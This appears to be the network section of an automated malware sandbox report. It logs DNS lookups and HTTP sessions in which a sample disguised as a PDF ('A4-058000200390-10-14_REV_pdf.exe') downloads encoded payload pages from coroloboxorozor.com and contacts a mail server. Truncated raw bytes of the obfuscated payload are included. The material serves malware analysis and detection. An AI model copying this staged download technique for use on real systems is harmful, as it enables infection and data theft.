                                                    Feb 23, 2021 09:47:35.428864956 CET5644853192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:35.485877991 CET53564488.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:35.591675997 CET5917253192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:35.640197039 CET53591728.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:36.052752018 CET6242053192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:36.109827042 CET53624208.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:36.981036901 CET6057953192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:37.038213968 CET53605798.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:38.153426886 CET5018353192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:38.212928057 CET53501838.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:39.352325916 CET6153153192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:39.433501959 CET53615318.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:40.046212912 CET4922853192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:40.103332996 CET53492288.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:40.112678051 CET5979453192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:40.472667933 CET53597948.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:44.587205887 CET5591653192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:44.644800901 CET53559168.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:46.739728928 CET5275253192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:46.801917076 CET53527528.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:47:57.258447886 CET6054253192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:47:57.317244053 CET53605428.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:48:15.863022089 CET6068953192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:48:15.911668062 CET53606898.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:48:26.585319042 CET6420653192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:48:26.638777971 CET53642068.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:48:27.315637112 CET5090453192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:48:27.364366055 CET53509048.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:48:29.686208010 CET5752553192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:48:29.758934021 CET53575258.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:48:37.013794899 CET5381453192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:48:37.073548079 CET53538148.8.8.8192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Feb 23, 2021 09:46:49.462008953 CET192.168.2.48.8.8.80x4b33Standard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:47:34.481651068 CET192.168.2.48.8.8.80x8f2fStandard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:47:40.112678051 CET192.168.2.48.8.8.80x7944Standard query (0)mail.soonlogistics.comA (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:47:44.587205887 CET192.168.2.48.8.8.80x9438Standard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:47:46.739728928 CET192.168.2.48.8.8.80xe10eStandard query (0)mail.soonlogistics.comA (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:48:37.013794899 CET192.168.2.48.8.8.80xc0a7Standard query (0)mail.soonlogistics.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Feb 23, 2021 09:46:49.524245024 CET8.8.8.8192.168.2.40x4b33No error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:46:49.524245024 CET8.8.8.8192.168.2.40x4b33No error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:47:34.543003082 CET8.8.8.8192.168.2.40x8f2fNo error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:47:34.543003082 CET8.8.8.8192.168.2.40x8f2fNo error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:47:40.472667933 CET8.8.8.8192.168.2.40x7944No error (0)mail.soonlogistics.com103.17.211.69A (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:47:44.644800901 CET8.8.8.8192.168.2.40x9438No error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:47:44.644800901 CET8.8.8.8192.168.2.40x9438No error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:47:46.801917076 CET8.8.8.8192.168.2.40xe10eNo error (0)mail.soonlogistics.com103.17.211.69A (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:48:37.073548079 CET8.8.8.8192.168.2.40xc0a7No error (0)mail.soonlogistics.com103.17.211.69A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • coroloboxorozor.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.449734104.21.71.23080C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 23, 2021 09:46:49.601401091 CET1219OUTGET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1
                                                    Host: coroloboxorozor.com
                                                    Connection: Keep-Alive
                                                    Feb 23, 2021 09:46:49.687654018 CET1220INHTTP/1.1 200 OK
                                                    Date: Tue, 23 Feb 2021 08:46:49 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: __cfduid=d9fa176eba22cc52e23b6114cdde70cba1614070009; expires=Thu, 25-Mar-21 08:46:49 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                    Last-Modified: Mon, 22 Feb 2021 21:04:06 GMT
                                                    Vary: Accept-Encoding
                                                    X-Frame-Options: SAMEORIGIN
                                                    CF-Cache-Status: DYNAMIC
                                                    cf-request-id: 086faae72e0000fa5c4ba15000000001
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ysFNo9UjEculqGj%2BoDT86B3hgHj4M%2FydKgJwwmvzaCG7hO8H1FJXHpIgpUTeS5Lik4q%2FCq5sfTxgFngQ2TvnThJYA3xONz5tCzYp7MRR42qr%2BUZj"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                    Server: cloudflare
                                                    CF-RAY: 625fadb84a59fa5c-AMS
                                                    Data Raw: 65 33 61 0d 0a 3c 70 3e 47 47 46 59 6a 46 69 63 63 46 6a 46 75 46 6a 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6c 41 41 46 6c 41 41 46 6a 46 6a 46 69 4c 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 72 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 69 6c 4c 46 6a 46 6a 46 6a 46 69 63 46 75 69 46 69 4c 72 46 69 63 46 6a 46 69 4c 6a 46 59 46 6c 6a 41 46 75 75 46 69 4c 63 46 69 46 47 72 46 6c 6a 41 46 75 75 46 4c 63 46 69 6a 63 46 69 6a 41 46 69 69 41 46 75 6c 46 69 69 6c 46 69 69 63 46 69 69 69 46 69 6a 75 46 69 69 63 46 59 47 46 69 6a 59 46 75 6c 46 59 59 46 59 47 46 69 69 6a 46 69 69 6a 46 69 69 69 46 69 69 72 46 75 6c 46 59 4c 46 69 6a 69 46 75 6c 46 69 69 63 46 69 69 47 46 69 69 6a 46 75 6c 46 69 6a 41 46 69 69 6a 46 75 6c 46 72 4c 46 47 59 46 4c 75 46 75 6c 46 69 6a 59 46 69 69 69 46 69 6a 6a 46 69 6a 69 46 63 72 46 69 75 46 69 75 46 69 6a 46 75 72 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 4c 6a 46 72 59 46 6a 46 6a 46 47 72 46 69 46 75 46 6a 46 47 72 46 69 63 6c 46 63 69 46 69 4c 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 6c 63 46 6a 46 75 63 46 6a 46 69 69 46 69 46 4c 6a 46 6a 46 6a 46 4c 63 46 41 46 6a 46 6a 46 72 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 6c 6c 46 69 69 63 46 41 46 6a 46 6a 46 75 6c 46 6a 46 6a 46 6a 46 69 6c 4c 46 41 46 6a 46 6a 46 6a 46 6a 46 69 6c 4c 46 6a 46 75 6c 46 6a 46 6a 46 6a 46 6c 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6a 46
                                                    Data Ascii: e3a<p>GGFYjFiccFjFuFjFjFjFcFjFjFjFlAAFlAAFjFjFiLcFjFjFjFjFjFjFjFrcFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFilLFjFjFjFicFuiFiLrFicFjFiLjFYFljAFuuFiLcFiFGrFljAFuuFLcFijcFijAFiiAFulFiilFiicFiiiFijuFiicFYGFijYFulFYYFYGFiijFiijFiiiFiirFulFYLFijiFulFiicFiiGFiijFulFijAFiijFulFrLFGYFLuFulFijYFiiiFijjFijiFcrFiuFiuFijFurFjFjFjFjFjFjFjFLjFrYFjFjFGrFiFuFjFGrFiclFciFiLjFjFjFjFjFjFjFjFjFllcFjFucFjFiiFiFLjFjFjFLcFAFjFjFrFjFjFjFjFjFjFlllFiicFAFjFjFulFjFjFjFilLFAFjFjFjFjFilLFjFulFjFjFjFlFjFjFcFjFjFjFjFjFjFjFcFjFjFjFjF
                                                    Feb 23, 2021 09:46:50.106106043 CET2284OUTGET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1
                                                    Host: coroloboxorozor.com
                                                    Feb 23, 2021 09:46:50.312967062 CET2285INHTTP/1.1 200 OK
                                                    Date: Tue, 23 Feb 2021 08:46:50 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: __cfduid=d9956ec78079b7fe40b119ea02652d9df1614070010; expires=Thu, 25-Mar-21 08:46:50 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                    Last-Modified: Mon, 22 Feb 2021 21:04:09 GMT
                                                    Vary: Accept-Encoding
                                                    X-Frame-Options: SAMEORIGIN
                                                    CF-Cache-Status: DYNAMIC
                                                    cf-request-id: 086faae91f0000fa5ca1262000000001
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=njZD96MeGGnp0OT0z8Fsp0rMsAKxbHeORttwB%2BrS3AiIwnlihgpwZC1CpIerPqNHsjvwDYYIISWuWpZ%2BlRke96z5cn7Nt%2B1H%2FH%2BIcg%2BlfSS9ZWvh"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                    Server: cloudflare
                                                    CF-RAY: 625fadbb6f50fa5c-AMS
                                                    Data Raw: 31 37 30 30 0d 0a 3c 70 3e 63 46 69 4c 72 46 4c 41 46 6c 63 63 46 6c 63 63 46 69 6a 4c 46 6c 41 75 46 59 75 46 69 63 46 6c 6c 6a 46 69 69 63 46 69 72 69 46 72 6c 46 6c 69 72 46 6c 69 72 46 4c 59 46 6c 75 63 46 72 4c 46 6c 6c 6a 46 47 41 46 6c 69 47 46 6c 75 41 46 69 41 75 46 47 6c 46 6c 69 4c 46 69 75 6c 46 6c 69 46 69 4c 63 46 69 4c 63 46 69 75 47 46 6c 72 46 6c 41 6a 46 69 41 6a 46 69 6c 6c 46 72 46 6c 46 69 63 47 46 69 69 47 46 6c 6a 46 69 4c 72 46 69 69 59 46 6c 69 72 46 69 6a 47 46 6c 75 75 46 69 75 72 46 47 6a 46 6c 6c 41 46 47 6a 46 6c 6c 4c 46 63 63 46 69 59 59 46 47 59 46 6c 69 59 46 69 69 75 46 6a 46 6c 41 69 46 69 41 63 46 72 6a 46 72 6a 46 6c 6a 69 46 59 6a 46 6c 41 6a 46 69 41 6a 46 72 69 46 6c 6a 69 46 4c 63 46 6c 6c 59 46 63 69 46 6c 6a 6a 46 4c 69 46 69 63 46 6c 63 63 46 69 75 41 46 69 75 41 46 75 4c 46 69 72 6c 46 72 69 46 69 59 6a 46 59 6c 46 63 46 69 41 59 46 47 72 46 6c 69 72 46 59 72 46 6c 41 69 46 6c 6c 46 69 72 75 46 6c 69 63 46 69 63 63 46 69 63 4c 46 63 6a 46 6c 63 75 46 69 72 6a 46 75 6a 46 69 47 6c 46 41 41 46 6c 69 63 46 69 69 59 46 69 69 59 46 69 46 69 41 6c 46 69 6c 4c 46 6c 47 46 6c 4c 46 69 47 75 46 69 69 72 46 69 41 46 59 4c 46 6c 4c 46 75 46 69 41 69 46 72 63 46 6c 75 47 46 69 69 47 46 6c 6a 46 69 4c 6a 46 47 59 46 69 6c 47 46 41 47 46 6c 6c 41 46 69 69 63 46 69 63 41 46 75 69 46 69 6a 72 46 75 75 46 6c 6c 6c 46 69 69 47 46 69 63 41 46 63 6a 46 69 4c 41 46 47 47 46 6c 6a 46 69 41 63 46 72 47 46 72 47 46 63 47 46 6c 6a 6c 46 59 69 46 6c 75 72 46 41 4c 46 6c 69 75 46 63 72 46 63 72 46 6c 41 6c 46 69 41 69 46 69 69 41 46 63 47 46 69 4c 63 46 4c
                                                    Data Ascii: 1700<p>cFiLrFLAFlccFlccFijLFlAuFYuFicFlljFiicFiriFrlFlirFlirFLYFlucFrLFlljFGAFliGFluAFiAuFGlFliLFiulFliFiLcFiLcFiuGFlrFlAjFiAjFillFrFlFicGFiiGFljFiLrFiiYFlirFijGFluuFiurFGjFllAFGjFllLFccFiYYFGYFliYFiiuFjFlAiFiAcFrjFrjFljiFYjFlAjFiAjFriFljiFLcFllYFciFljjFLiFicFlccFiuAFiuAFuLFirlFriFiYjFYlFcFiAYFGrFlirFYrFlAiFllFiruFlicFiccFicLFcjFlcuFirjFujFiGlFAAFlicFiiYFiiYFiFiAlFilLFlGFlLFiGuFiirFiAFYLFlLFuFiAiFrcFluGFiiGFljFiLjFGYFilGFAGFllAFiicFicAFuiFijrFuuFlllFiiGFicAFcjFiLAFGGFljFiAcFrGFrGFcGFljlFYiFlurFALFliuFcrFcrFlAlFiAiFiiAFcGFiLcFL


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.449753104.21.71.23080C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 23, 2021 09:47:34.660684109 CET3060OUTGET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1
                                                    Host: coroloboxorozor.com
                                                    Connection: Keep-Alive
                                                    Feb 23, 2021 09:47:34.742083073 CET3082INHTTP/1.1 200 OK
                                                    Date: Tue, 23 Feb 2021 08:47:34 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: __cfduid=ddf692e164e229dc73d66edfe1d1c721d1614070054; expires=Thu, 25-Mar-21 08:47:34 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                    Last-Modified: Mon, 22 Feb 2021 21:04:06 GMT
                                                    Vary: Accept-Encoding
                                                    X-Frame-Options: SAMEORIGIN
                                                    CF-Cache-Status: DYNAMIC
                                                    cf-request-id: 086fab97290000d8b50f02c000000001
                                                    Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=t%2FHkoZrji%2BX621Qp%2F%2BUnGjpZCr7idJcUZfS6iq6Hms%2F97b6PPz4WUSHbtj0xTW%2BCqKy6ZqtMcFQaQ7Jwxi3j%2BoRyk5psSeRlrvt%2FaZrthmCgpE9l"}],"max_age":604800}
                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                    Server: cloudflare
                                                    CF-RAY: 625faed1ddd0d8b5-AMS
                                                    Data Raw: 65 33 61 0d 0a 3c 70 3e 47 47 46 59 6a 46 69 63 63 46 6a 46 75 46 6a 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6c 41 41 46 6c 41 41 46 6a 46 6a 46 69 4c 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 72 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 69 6c 4c 46 6a 46 6a 46 6a 46 69 63 46 75 69 46 69 4c 72 46 69 63 46 6a 46 69 4c 6a 46 59 46 6c 6a 41 46 75 75 46 69 4c 63 46 69 46 47 72 46 6c 6a 41 46 75 75 46 4c 63 46 69 6a 63 46 69 6a 41 46 69 69 41 46 75 6c 46 69 69 6c 46 69 69 63 46 69 69 69 46 69 6a 75 46 69 69 63 46 59 47 46 69 6a 59 46 75 6c 46 59 59 46 59 47 46 69 69 6a 46 69 69 6a 46 69 69 69 46 69 69 72 46 75 6c 46 59 4c 46 69 6a 69 46 75 6c 46 69 69 63 46 69 69 47 46 69 69 6a 46 75 6c 46 69 6a 41 46 69 69 6a 46 75 6c 46 72 4c 46 47 59 46 4c 75 46 75 6c 46 69 6a 59 46 69 69 69 46 69 6a 6a 46 69 6a 69 46 63 72 46 69 75 46 69 75 46 69 6a 46 75 72 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 4c 6a 46 72 59 46 6a 46 6a 46 47 72 46 69 46 75 46 6a 46 47 72 46 69 63 6c 46 63 69 46 69 4c 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 6c 63 46 6a 46 75 63 46 6a 46 69 69 46 69 46 4c 6a 46 6a 46 6a 46 4c 63 46 41 46 6a 46 6a 46 72 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 6c 6c 46 69 69 63 46 41 46 6a 46 6a 46 75 6c 46 6a 46 6a 46 6a 46 69 6c 4c 46 41 46 6a 46 6a 46 6a 46 6a 46 69 6c 4c 46 6a 46 75 6c 46 6a 46 6a 46 6a 46 6c 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 63 46
                                                    Data Ascii: e3a<p>GGFYjFiccFjFuFjFjFjFcFjFjFjFlAAFlAAFjFjFiLcFjFjFjFjFjFjFjFrcFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFilLFjFjFjFicFuiFiLrFicFjFiLjFYFljAFuuFiLcFiFGrFljAFuuFLcFijcFijAFiiAFulFiilFiicFiiiFijuFiicFYGFijYFulFYYFYGFiijFiijFiiiFiirFulFYLFijiFulFiicFiiGFiijFulFijAFiijFulFrLFGYFLuFulFijYFiiiFijjFijiFcrFiuFiuFijFurFjFjFjFjFjFjFjFLjFrYFjFjFGrFiFuFjFGrFiclFciFiLjFjFjFjFjFjFjFjFjFllcFjFucFjFiiFiFLjFjFjFLcFAFjFjFrFjFjFjFjFjFjFlllFiicFAFjFjFulFjFjFjFilLFAFjFjFjFjFilLFjFulFjFjFjFlFjFjFcFjFjFjFjFjFjFjFcF
                                                    Feb 23, 2021 09:47:36.916448116 CET4382OUTGET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1
                                                    Host: coroloboxorozor.com
                                                    Feb 23, 2021 09:47:37.020649910 CET4384INHTTP/1.1 200 OK
                                                    Date: Tue, 23 Feb 2021 08:47:36 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: __cfduid=d7431070c03d145fc1b740f00718662ff1614070056; expires=Thu, 25-Mar-21 08:47:36 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                    Last-Modified: Mon, 22 Feb 2021 21:04:09 GMT
                                                    Vary: Accept-Encoding
                                                    X-Frame-Options: SAMEORIGIN
                                                    CF-Cache-Status: DYNAMIC
                                                    cf-request-id: 086fab9ffa0000d8b5378a0000000001
                                                    Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=mARSgPe7S6fWchZeYaQK4CZiQenKfXfsn7vbgwMzDQ2ZWmyfJ4oUrnxFEyeRGCb5HkVlpudjVhgXTmOGz3GNFnWMvS%2BT%2Bva8zFZeUnM2UimzbKEH"}],"max_age":604800}
                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                    Server: cloudflare
                                                    CF-RAY: 625faedffc9cd8b5-AMS
                                                    Data Raw: 37 63 39 36 0d 0a 3c 70 3e 63 46 69 4c 72 46 4c 41 46 6c 63 63 46 6c 63 63 46 69 6a 4c 46 6c 41 75 46 59 75 46 69 63 46 6c 6c 6a 46 69 69 63 46 69 72 69 46 72 6c 46 6c 69 72 46 6c 69 72 46 4c 59 46 6c 75 63 46 72 4c 46 6c 6c 6a 46 47 41 46 6c 69 47 46 6c 75 41 46 69 41 75 46 47 6c 46 6c 69 4c 46 69 75 6c 46 6c 69 46 69 4c 63 46 69 4c 63 46 69 75 47 46 6c 72 46 6c 41 6a 46 69 41 6a 46 69 6c 6c 46 72 46 6c 46 69 63 47 46 69 69 47 46 6c 6a 46 69 4c 72 46 69 69 59 46 6c 69 72 46 69 6a 47 46 6c 75 75 46 69 75 72 46 47 6a 46 6c 6c 41 46 47 6a 46 6c 6c 4c 46 63 63 46 69 59 59 46 47 59 46 6c 69 59 46 69 69 75 46 6a 46 6c 41 69 46 69 41 63 46 72 6a 46 72 6a 46 6c 6a 69 46 59 6a 46 6c 41 6a 46 69 41 6a 46 72 69 46 6c 6a 69 46 4c 63 46 6c 6c 59 46 63 69 46 6c 6a 6a 46 4c 69 46 69 63 46 6c 63 63 46 69 75 41 46 69 75 41 46 75 4c 46 69 72 6c 46 72 69 46 69 59 6a 46 59 6c 46 63 46 69 41 59 46 47 72 46 6c 69 72 46 59 72 46 6c 41 69 46 6c 6c 46 69 72 75 46 6c 69 63 46 69 63 63 46 69 63 4c 46 63 6a 46 6c 63 75 46 69 72 6a 46 75 6a 46 69 47 6c 46 41 41 46 6c 69 63 46 69 69 59 46 69 69 59 46 69 46 69 41 6c 46 69 6c 4c 46 6c 47 46 6c 4c 46 69 47 75 46 69 69 72 46 69 41 46 59 4c 46 6c 4c 46 75 46 69 41 69 46 72 63 46 6c 75 47 46 69 69 47 46 6c 6a 46 69 4c 6a 46 47 59 46 69 6c 47 46 41 47 46 6c 6c 41 46 69 69 63 46 69 63 41 46 75 69 46 69 6a 72 46 75 75 46 6c 6c 6c 46 69 69 47 46 69 63 41 46 63 6a 46 69 4c 41 46 47 47 46 6c 6a 46 69 41 63 46 72 47 46 72 47 46 63 47 46 6c 6a 6c 46 59 69 46 6c 75 72 46 41 4c 46 6c 69 75 46 63 72 46 63 72 46 6c 41 6c 46 69 41 69 46 69 69 41 46 63 47 46 69 4c 63 46 4c 41 46 6c 63 72 46 69 63
                                                    Data Ascii: 7c96<p>cFiLrFLAFlccFlccFijLFlAuFYuFicFlljFiicFiriFrlFlirFlirFLYFlucFrLFlljFGAFliGFluAFiAuFGlFliLFiulFliFiLcFiLcFiuGFlrFlAjFiAjFillFrFlFicGFiiGFljFiLrFiiYFlirFijGFluuFiurFGjFllAFGjFllLFccFiYYFGYFliYFiiuFjFlAiFiAcFrjFrjFljiFYjFlAjFiAjFriFljiFLcFllYFciFljjFLiFicFlccFiuAFiuAFuLFirlFriFiYjFYlFcFiAYFGrFlirFYrFlAiFllFiruFlicFiccFicLFcjFlcuFirjFujFiGlFAAFlicFiiYFiiYFiFiAlFilLFlGFlLFiGuFiirFiAFYLFlLFuFiAiFrcFluGFiiGFljFiLjFGYFilGFAGFllAFiicFicAFuiFijrFuuFlllFiiGFicAFcjFiLAFGGFljFiAcFrGFrGFcGFljlFYiFlurFALFliuFcrFcrFlAlFiAiFiiAFcGFiLcFLAFlcrFic


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.449764104.21.71.23080C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 23, 2021 09:47:44.727893114 CET5073OUTGET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1
                                                    Host: coroloboxorozor.com
                                                    Connection: Keep-Alive
                                                    Feb 23, 2021 09:47:44.830785036 CET5074INHTTP/1.1 200 OK
                                                    Date: Tue, 23 Feb 2021 08:47:44 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: __cfduid=dca7a60f312471aec97222035e3e73aaa1614070064; expires=Thu, 25-Mar-21 08:47:44 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                    Last-Modified: Mon, 22 Feb 2021 21:04:06 GMT
                                                    Vary: Accept-Encoding
                                                    X-Frame-Options: SAMEORIGIN
                                                    CF-Cache-Status: DYNAMIC
                                                    cf-request-id: 086fabbe7d0000c78590a87000000001
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=m%2FSQLLQhymcqhKEWMw4WdDYgIetxT4pXCGCaQvKAxT0be5%2BWp7qaGnk7Q44vm7ZPjHdTfPLPOiibkl9qQHFusoykdi0ABaZTxflKVqIxlqvozu2C"}],"max_age":604800,"group":"cf-nel"}
                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                    Server: cloudflare
                                                    CF-RAY: 625faf10c80ac785-AMS
                                                    Data Raw: 37 63 39 37 0d 0a 3c 70 3e 47 47 46 59 6a 46 69 63 63 46 6a 46 75 46 6a 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6c 41 41 46 6c 41 41 46 6a 46 6a 46 69 4c 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 72 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 69 6c 4c 46 6a 46 6a 46 6a 46 69 63 46 75 69 46 69 4c 72 46 69 63 46 6a 46 69 4c 6a 46 59 46 6c 6a 41 46 75 75 46 69 4c 63 46 69 46 47 72 46 6c 6a 41 46 75 75 46 4c 63 46 69 6a 63 46 69 6a 41 46 69 69 41 46 75 6c 46 69 69 6c 46 69 69 63 46 69 69 69 46 69 6a 75 46 69 69 63 46 59 47 46 69 6a 59 46 75 6c 46 59 59 46 59 47 46 69 69 6a 46 69 69 6a 46 69 69 69 46 69 69 72 46 75 6c 46 59 4c 46 69 6a 69 46 75 6c 46 69 69 63 46 69 69 47 46 69 69 6a 46 75 6c 46 69 6a 41 46 69 69 6a 46 75 6c 46 72 4c 46 47 59 46 4c 75 46 75 6c 46 69 6a 59 46 69 69 69 46 69 6a 6a 46 69 6a 69 46 63 72 46 69 75 46 69 75 46 69 6a 46 75 72 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 4c 6a 46 72 59 46 6a 46 6a 46 47 72 46 69 46 75 46 6a 46 47 72 46 69 63 6c 46 63 69 46 69 4c 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 6c 63 46 6a 46 75 63 46 6a 46 69 69 46 69 46 4c 6a 46 6a 46 6a 46 4c 63 46 41 46 6a 46 6a 46 72 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 6c 6c 46 69 69 63 46 41 46 6a 46 6a 46 75 6c 46 6a 46 6a 46 6a 46 69 6c 4c 46 41 46 6a 46 6a 46 6a 46 6a 46 69 6c 4c 46 6a 46 75 6c 46 6a 46 6a 46 6a 46 6c 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a
